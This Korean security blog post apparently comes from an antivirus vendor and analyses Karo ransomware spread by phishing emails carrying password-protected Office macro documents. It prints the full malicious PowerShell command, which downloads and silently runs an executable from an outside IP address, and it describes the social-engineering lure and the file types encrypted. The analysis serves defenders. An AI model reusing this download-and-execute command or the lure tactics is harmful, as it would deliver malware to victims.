포스팅 내용

국내외 보안동향

Karo 랜섬웨어 분석

최근 MS오피스 문서가 첨부된 이메일을 통해 Karo 랜섬웨어가 유포되고 있습니다. 


초기


공격자는 피해자들에게 수천달러가 청구되었다며 첨부파일을 열도록 유도합니다. 


공격자는 기업과 관련된 잘 알려진 이메일 서비스 이용 / 제목과 인사말에 수신자의 이름 넣기 / 큰 금액이지만 비현실적이지는 않은 금액 청구를 통해 사용자의 즉각적인 행동 유도하며 의심을 최소화 합니다. 


첨부파일


Karo 이메일에 첨부된 오피스 문서 페이로드는 패스워드로 보호되고 있습니다. 악성 스팸에서 흔한일은 아니지만, 올해 초 몇몇 TrickBot 캠페인에도 패스워드로 보호된 오피스 문서를 이용한적이 있었습니다. 패스워드를 통해 보호하면 백신의 탐지를 보다 쉽게 우회할 수는 있을지 모르겠지만 널리 확산되지 못하기 때문에 감염율이 낮아집니다. 


악성 문서가 오픈 되고 패스워드(캠페인에 사용 된 모든 문서에 동일하게 사용 되는 것으로 보임)가 입력 되면, 사용자에게 매크로를 활성화하라고 요청합니다. 이 문서는 ‘보호’되어 있기 때문에 반드시 PC에서 열어 컨텐츠를 활성화 해야 한다고 사용자에게 경고합니다.



다운로드 및 실행


활성화 된 매크로는 cmd.exe를 오픈하고 랜섬웨어의 페이로드를 호출하는 Powershell 명령어를 실행합니다. Powershell은 악성코드 패밀리들이 사용자의 PC에 자기자신을 다운로드 및 설치하는데 흔히 사용됩니다. 아래 명령은 사용자의 상호작용 없이도 Karo를 초기화하고 실행하는 기능을 포함하고 있습니다.


Cmdline: powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.165.29.78/~alex/svchost.exe' , 'C:\Users\SBOX~1\AppData\Local\Temp\svchost.exe')& PING -n 15 127.0.0.1>nul & %tmp%\svchost.exe



암호화


.NET으로 코딩 된 Karo는 아래 확장명을 가진 파일들을 암호화하는데 온보드 RijndaelManaged 클래스를 사용합니다.


.txt

.sql

.cs

.cpp

.text

.js

.html

.java

.pl

.c

.mdb

.ruby

.jpg

.png

.bmp

.doc

.csv

.xls

.docx

.docm

.ppt

 

이후 확장명 “ipygh”를 덧붙입니다. 보통 랜섬웨어들은 오피스 문서들과 사진 파일들을 암호화하지만, Karo는 여러 프로그래밍 언어 소스 파일들을 포함합니다.


현재 알약에서는 해당 랜섬웨어에 대하여 Trojan.Ransom.Karo로 탐지중에 있습니다. 





출처 : 

https://info.phishlabs.com/blog/not-notpetya-an-analysis-of-karo-ransomware

https://virustotal.com/ko/file/bb6a1544a25e40afc514f11add6c3aa016231204871df309cefeaf4c0493b0d7/analysis/

티스토리 방명록 작성
name password homepage